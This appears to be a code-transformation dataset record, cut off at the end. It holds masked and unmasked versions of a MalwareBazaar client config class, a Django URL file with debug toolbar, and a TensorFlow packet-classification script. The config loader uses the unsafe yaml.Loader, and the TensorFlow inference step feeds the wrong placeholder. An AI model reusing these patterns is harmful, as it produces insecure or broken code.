Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
import os
import io
import yaml
from collections import OrderedDict
from rich.console import Console
from malwarebazaar.platform import get_config_path, get_config_dir
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
import os
import io
import yaml
from collections import OrderedDict
from rich.console import Console
from malwarebazaar.platform import get_config_path, get_config_dir
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style="bold red")
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file) == 0:
ec.print("Config does not exist, please run the init command.")
exit(-1)
with io.open(config_file, "r") as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console = Console(stderr=True, style="bold red")):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f"{config_dir} should be a dir, but is a file.")
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), "w") as handle:
bytes = handle.write(yaml.dump(
{
"api_key": key,
"csv_columns": {
"md5": "md5_hash",
"sha1": "sha1_hash",
"sha256": "sha256_hash",
"imphash": "imphash",
"signature": "signature",
"tags": "tags"
}
},
Dumper=yaml.Dumper
))
if bytes <= 0:
raise IOError(f"Writing to config file failed.")
return True
|
flexible
|
{
"blob_id": "5a9e0b220d2c94aea7e3d67338771cf48c3aec8f",
"index": 6439,
"step-1": "<mask token>\n\n\nclass Config(OrderedDict):\n <mask token>\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Config(OrderedDict):\n <mask token>\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-3": "<mask token>\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-4": "import os\nimport io\nimport yaml\nfrom collections import OrderedDict\nfrom rich.console import Console\nfrom malwarebazaar.platform import get_config_path, get_config_dir\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-5": "import os\nimport io\nimport yaml\nfrom collections import OrderedDict\n\nfrom rich.console import Console\n\nfrom malwarebazaar.platform import get_config_path, get_config_dir\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style=\"bold red\")\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file) == 0:\n ec.print(\"Config does not exist, please run the init command.\")\n exit(-1)\n\n with io.open(config_file, \"r\") as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console = Console(stderr=True, style=\"bold red\")):\n config_dir = get_config_dir()\n\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n\n if not os.path.isdir(config_dir):\n ec.print(f\"{config_dir} should be a dir, but is a file.\")\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), \"w\") as handle:\n bytes = handle.write(yaml.dump(\n {\n \"api_key\": key,\n \"csv_columns\": {\n \"md5\": \"md5_hash\",\n \"sha1\": \"sha1_hash\",\n \"sha256\": \"sha256_hash\",\n \"imphash\": \"imphash\",\n \"signature\": \"signature\",\n \"tags\": \"tags\"\n }\n },\n Dumper=yaml.Dumper\n ))\n\n if bytes <= 0:\n raise IOError(f\"Writing to config file failed.\")\n return True\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'login_test_app.urls')), path('accounts/', include('allauth.urls')),
path('__debug__/', include(debug_toolbar.urls))]
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
from django.contrib import admin
from django.contrib.staticfiles.urls import static
from django.urls import path, include
from . import settings_common, settings_dev
import debug_toolbar
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'login_test_app.urls')), path('accounts/', include('allauth.urls')),
path('__debug__/', include(debug_toolbar.urls))]
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
from django.contrib import admin
from django.contrib.staticfiles.urls import static # 本Ch11.1
from django.urls import path, include
from . import settings_common, settings_dev # 本Ch11.1
import debug_toolbar
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('login_test_app.urls')),
path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218
path('__debug__/', include(debug_toolbar.urls)),
]
# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から
# 返されたルーティングを追加する
urlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)
|
flexible
|
{
"blob_id": "ce626afa7c0fd2e190afd92b57a0ebebf19f9e9b",
"index": 6842,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-3": "<mask token>\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-4": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static\nfrom django.urls import path, include\nfrom . import settings_common, settings_dev\nimport debug_toolbar\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-5": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static # 本Ch11.1\nfrom django.urls import path, include\n\nfrom . import settings_common, settings_dev # 本Ch11.1\nimport debug_toolbar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('login_test_app.urls')),\n path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218\n path('__debug__/', include(debug_toolbar.urls)),\n\n]\n\n# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から\n# 返されたルーティングを追加する\nurlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.
random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf
.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([
n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([
n_classes]))}
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
from convert_data2 import array_rule
from convert_data2 import array_packet
import tensorflow as tf
import numpy as np
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.
random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf
.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.
random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.
random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([
n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([
n_classes]))}
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[
'bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']
)
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']
)
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=
prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:
batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs,
'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)
)
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
<|reserved_special_token_1|>
from convert_data2 import array_rule
from convert_data2 import array_packet
import tensorflow as tf
import numpy as np
train_x, train_y = array_packet()
x_input, input_ip = array_rule()
n_nodes_hl1 = 210
n_nodes_hl2 = 210
n_nodes_hl3 = 210
n_classes = 2
batch_size = 500
hm_epochs = 20
x = tf.placeholder('float')
y = tf.placeholder('float')
z = tf.placeholder('float')
hidden_1_layer = {'f_fum': n_nodes_hl1,
'weight': tf.Variable(tf.random_normal([train_x.shape[1], n_nodes_hl1])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl1]))}
hidden_2_layer = {'f_fum': n_nodes_hl2,
'weight': tf.Variable(tf.random_normal([n_nodes_hl1, n_nodes_hl2])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl2]))}
hidden_3_layer = {'f_fum': n_nodes_hl3,
'weight': tf.Variable(tf.random_normal([n_nodes_hl2, n_nodes_hl3])),
'bias': tf.Variable(tf.random_normal([n_nodes_hl3]))}
output_layer = {'f_fum': None,
'weight': tf.Variable(tf.random_normal([n_nodes_hl3, n_classes])),
'bias': tf.Variable(tf.random_normal([n_classes])), }
def neural_network_model(data):
l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer['bias'])
l1 = tf.nn.relu(l1)
l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias'])
l2 = tf.nn.relu(l2)
l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias'])
l3 = tf.nn.relu(l3)
output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']
return output
def train_neural_network(x):
prediction = neural_network_model(x)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
for epoch in range(hm_epochs):
epoch_loss = 0
i = 0
while i < len(train_x):
start = i
end = i + batch_size
batch_x = np.array(train_x[start:end])
batch_y = np.array(train_y[start:end])
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x,
y: batch_y})
epoch_loss += c
i += batch_size
print('Epoch', epoch + 1, 'completed out of', hm_epochs, 'loss:', epoch_loss)
result_array = np.array([])
batch_x = np.array(x_input)
print(batch_x)
result = (sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)))
result_array = np.append(result_array, result)
return result_array
train_neural_network(x)
|
flexible
|
{
"blob_id": "1446268583bf9fa3375319eae3c21cf47f47faca",
"index": 7279,
"step-1": "<mask token>\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-3": "<mask token>\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\nhidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.\n random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf\n .random_normal([n_nodes_hl1]))}\nhidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl2]))}\nhidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl3]))}\noutput_layer = {'f_fum': None, 'weight': tf.Variable(tf.random_normal([\n n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([\n n_classes]))}\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-4": "from convert_data2 import array_rule\nfrom convert_data2 import array_packet\nimport tensorflow as tf\nimport numpy as np\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\nhidden_1_layer = {'f_fum': n_nodes_hl1, 'weight': tf.Variable(tf.\n random_normal([train_x.shape[1], n_nodes_hl1])), 'bias': tf.Variable(tf\n .random_normal([n_nodes_hl1]))}\nhidden_2_layer = {'f_fum': n_nodes_hl2, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl1, n_nodes_hl2])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl2]))}\nhidden_3_layer = {'f_fum': n_nodes_hl3, 'weight': tf.Variable(tf.\n random_normal([n_nodes_hl2, n_nodes_hl3])), 'bias': tf.Variable(tf.\n random_normal([n_nodes_hl3]))}\noutput_layer = {'f_fum': None, 'weight': 